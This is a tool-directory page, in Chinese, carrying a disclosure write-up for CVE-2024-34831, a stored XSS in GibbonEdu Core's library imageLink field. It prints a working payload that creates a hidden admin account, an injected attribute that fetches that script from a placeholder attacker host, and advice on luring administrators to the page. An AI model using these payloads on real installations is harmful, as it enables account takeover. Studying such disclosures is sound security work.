Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-34831 — CVE-2024-34831 的披露 | Kitploit
工具/GitHubGitHub/enzored/cve-2024-34831
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubenzored/cve-2024-34831

CVE-2024-34831

CVE-2024-34831 的披露

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-34831 在 GibbonEdu Core v26.0.00 中的 XSS 漏洞导致权限提升

Gibbon 是一个功能齐全的开源学校管理系统。目前正在大力重构较为陈旧的代码库。

作者:Christian Bajada

1. 漏洞

编辑/提交新书籍时 (/modules/Library/library_manage_catalog_editProcess.php) 的 imageLink 参数容易受到 XSS 攻击。具有管理目录权限的用户可以利用此漏洞,导致具有更高级别权限的用户执行任意脚本,从而提升权限。

2. 概念验证(PoC)简单场景

  1. 导航至 学习 > 图书馆 > 管理目录
  2. 编辑其中一个书籍条目。
  3. 图片链接字段未正确清理,允许我们运行任意 JavaScript。将图片链接修改为 [http://x](http://x/)" onerror='alert(1)' ,在加载图书馆页面时,警报代码将在页面加载时执行:

Gibbon_XSS_1

Gibbon_XSS_1

3. 用于权限提升的概念验证(PoC)

本节解释了如何利用此漏洞进行更危险的操作,而不仅仅是一个简单的 alert(1) 弹窗。我们将诱骗已登录的管理员无缝创建另一个可由攻击者访问的管理员账户。

imageLink 字段太小,无法让我们调用 Gibbon 平台上的任何有意义的功能。我们只需将 JavaScript 托管在其他地方,然后让浏览器下载并执行它。缺少 CSP 使得这一点成为可能。

  1. 恶意用户按如下方式构造用于创建管理员用户的 payload,并将其放置在可公开访问的位置,例如 https://<yourserver.com>/payload.js。如果管理员执行以下代码,将创建一个名为 hexthecat 的管理员用户。该代码调用 Gibbon Core 上的函数来创建一个包含所有必需参数的新用户。
root@kitploit:~
fetch('./modules/User%20Admin/user_manage_addProcess.php', { method: 'POST', body: new URLSearchParams({ title: 'Mr.', surname: 'Cat', firstName: 'Hex', preferredName: 'Hex', 'officialName' : 'Hex', gender: 'M', dob: '01/04/2024', gibbonRoleIDPrimary: '001', username: 'hexthecat', passwordNew: 'Hexed001', passwordConfirm: 'Hexed001', status: 'full', canLogin: 'Y', passwordForceReset: 'Y' }) });
  1. 恶意的管理目录用户为书籍输入以下 imageLink(保留原始链接并添加脚本加载部分):

http://books.google.com/books?id=SluXuAAACAAJ&printsec=frontcover&img=1&zoom=1&source=gbs_api" onmouseover="$.getScript('https://<yourserver.com>/payload.js')"

  1. 管理员浏览图书馆。

你需要等待管理员导航到图书馆目录,或者通过即时通讯、电子邮件或其他渠道说服他们这样做。

将鼠标悬停(onmouseover)在书籍图片上会导致 payload 从指定位置(本例中为 <yourserver.com>)获取并执行。这将创建一个管理员用户,恶意用户可以访问该用户。也可以使用 'onerror' 监听器让 payload 立即执行,而无需将鼠标悬停在图片上。

你可以在菜单 管理 > 用户管理 中检查创建的用户

Gibbon_XSS_2

4. 负责任的披露

根据 https://github.com/GibbonEdu/core/security 上的负责任披露指南发布。

  • 2024 年 5 月 6 日:向 GibbonEdu 维护者报告并确认漏洞。
  • 2024 年 5 月 15 日:MITRE 分配 CVE 编号。
  • 2024 年 9 月 10 日:发布公告。
下载工具